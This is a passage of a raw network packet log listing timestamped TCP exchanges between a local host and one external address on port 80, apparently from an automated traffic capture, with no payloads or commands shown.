Jun 8, 2024 20:22:01.628614902 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.628635883 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.628667116 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.629101038 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.629120111 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.629139900 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.629158974 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.629167080 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.629180908 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.629189968 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.629199982 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.629220009 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.629231930 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.629250050 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.629251957 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.629272938 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.629292011 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.629293919 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.629312038 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.629314899 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.629332066 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.629334927 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.629352093 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.629354954 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.629370928 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.629373074 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.629390955 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.629410982 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.629410982 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.629430056 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.629451036 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.629451990 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.629470110 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.629487991 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.629489899 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.629509926 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.629528046 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.629548073 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.629570961 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.631005049 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.631022930 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.631047964 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.631072044 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.631108046 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.631108999 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.631129980 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.631150961 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.631182909 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.631215096 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.631395102 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.631454945 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.631504059 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.631522894 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.631542921 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.631566048 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.631597042 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.631670952 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.631737947 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.632251024 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.632309914 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.632349014 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.632369995 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.632405996 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.632437944 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.632528067 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.632546902 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.632584095 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.632613897 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.632710934 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.632730961 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.632751942 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.632766008 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.632771969 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.632785082 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.632808924 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.632858038 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.633188009 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.633208036 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.633227110 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.633245945 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.633285999 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.633285999 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.633369923 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.633388996 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.633409977 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.633425951 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.633462906 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.633462906 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.633543015 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.633563042 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.633605003 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.633636951 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.635696888 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.635715961 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.635735035 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.635754108 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.635755062 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.635772943 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.635776997 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.635792017 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.635797977 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.635812044 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.635818958 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.635832071 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.635838985 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.635854006 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.635859013 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.635874987 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.635879040 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.635915041 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.635948896 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.636133909 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.636153936 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.636173964 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.636188030 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.636226892 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.636226892 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.636384010 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.636404037 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.636423111 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.636437893 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.636451960 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.636459112 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.636472940 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.636477947 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.636501074 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.636522055 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.636523962 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.636523962 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.636540890 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.636553049 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.636574984 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.636595011 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.645478964 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.645514011 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.645550966 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.645615101 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.645651102 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.645905972 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.645939112 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.645965099 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.645975113 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.646008015 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.646008968 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.646028996 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.646047115 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.646065950 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.646083117 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.646102905 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.646117926 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.646141052 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.646151066 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.646166086 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.646186113 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.646208048 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.646219015 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.646246910 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.646253109 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.646267891 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.646287918 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.646312952 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.646322966 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.646342993 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.646357059 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.646380901 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.646390915 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.646419048 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.646425009 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.646441936 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.646460056 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.646481037 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.646497965 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.646517038 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.646533012 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.646554947 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.646564960 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.646591902 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.646600008 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.646614075 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.646634102 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.646657944 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.646667957 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.646691084 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.646701097 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.646725893 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.646749973 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.646770000 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.646783113 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.646806002 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.646816969 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.646830082 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.646852016 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.646873951 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.646887064 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.646912098 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.646922112 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.646950960 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.646958113 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.646970034 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.646991968 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.647017956 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.647026062 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.647047997 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.647059917 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.647084951 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.647097111 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.647106886 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.647130966 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.647154093 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.647166014 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.647188902 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.647198915 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.647223949 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.647233963 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.647259951 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.647270918 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.647289038 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.647305012 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.647325993 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.647337914 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.647358894 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.647372007 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.647394896 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.647407055 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.647430897 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.647440910 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.647454977 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.647475004 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.647494078 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.647509098 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.647533894 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.647543907 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.647558928 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.647578955 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.647599936 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.647613049 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.647638083 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.647648096 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.647674084 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.647684097 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.647697926 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.647717953 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.647739887 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.647751093 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.647770882 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.647784948 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.647808075 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.647819042 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.647847891 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.647855997 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.647876024 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.647891998 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.647902012 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.647927999 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.647947073 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.647962093 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.647981882 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.647999048 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.648019075 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.648068905 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.733297110 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.733390093 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.741923094 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.742007971 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.742933035 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.742970943 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.742999077 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.743029118 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.747024059 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.747091055 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.748087883 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.748121977 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.748157024 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.748178005 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.752598047 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.752633095 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.752671003 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.752701044 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.757112026 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.757147074 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.757179022 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.757210970 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.761113882 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.761149883 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.761172056 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.761179924 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.761204004 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.761214972 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.761226892 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.761271000 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.765163898 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.765197992 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.765232086 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.765260935 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.768927097 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.768961906 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.768987894 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.769018888 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.772654057 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.772689104 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.772721052 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.772722960 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.772741079 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.772780895 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.775614977 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.775650978 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.775700092 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.775732040 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.778606892 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.778623104 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.778661966 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.778695107 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.781595945 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.781611919 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.781626940 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.781656027 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.781687021 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.784589052 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.784605980 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.784653902 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.784693003 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.787590981 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.787609100 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.787652016 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.787683964 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.790553093 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.790569067 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.790632963 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.793569088 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.793586016 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.793598890 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.793613911 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.793642998 CEST	49731	80	192.168.2.4	23.88.106.134
